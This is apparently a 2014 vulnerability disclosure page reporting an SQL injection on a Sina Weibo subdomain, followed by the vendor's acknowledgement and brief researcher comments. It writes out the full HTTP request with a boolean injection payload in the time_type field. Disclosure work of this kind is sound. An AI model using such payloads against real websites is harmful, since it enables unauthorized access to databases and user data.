新浪微博某分站SQL注射

POST /aj/selectchart?__rnd=1409231809448 HTTP/1.1

Host: chart.weibo.com

User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Referer: http://chart.weibo.com/?leftnav=1&wvr=5&type=official&set=5?leftnav=1&wvr=5&type=official&set=5

Content-Length: 42

Cookie: cookie

Pragma: no-cache

Cache-Control: no-cache

Connection: Keep-Alive

time_type=201407 AND 1<0#&rank_type=2&_t=0

注入点 time_type

过滤

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2014-08-29 21:37

厂商回复：

感谢关注新浪安全，漏洞修复中。

最新状态：

暂无

1. 2014-08-28 22:04 | adm1n ( 普通白帽子 | Rank:216 漏洞数:66 | 只是一个渣渣而已。。。)

   1

   前排

   1# 回复此人

2. 2014-08-28 22:49 | 猪猪侠 ( 核心白帽子 | Rank:5372 漏洞数:282 | 你都有那么多超级棒棒糖了，还要自由干吗？)

   1

   厉害呀。

   2# 回复此人

3. 2014-08-28 23:35 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:207 | px1624)

   0

   每天就在测腾讯、新浪、搜狐这些大公司的sql么？

   3# 回复此人

4. 2014-08-29 00:13 | zeracker ( 普通白帽子 | Rank:1077 漏洞数:134 | 爱吃小龙虾。)

   1

   每有新功能，好像都会存在新漏洞。 这算打脸吗

   4# 回复此人

5. 2014-08-29 00:48 | phith0n ( 普通白帽子 | Rank:834 漏洞数:126 | 一个想当文人的黑客~)

   1

   你为何总是知道新功能……

   5# 回复此人

6. 2014-08-29 07:54 | 齐迹 ( 普通白帽子 | Rank:804 漏洞数:92 | 重庆地区招聘安全工程师。sec.zbj.com欢迎...)

   0

   新进了一波大学高材生。。

   6# 回复此人

7. 2014-08-29 09:05 | xyang ( 普通白帽子 | Rank:350 漏洞数:35 | stay hungry stay foolish)

   0

   囧

   7# 回复此人

8. 2014-08-29 09:07 | 黑色的屌丝 ( 实习白帽子 | Rank:39 漏洞数:6 | →_→→_→)

   1

   火钳留名

   8# 回复此人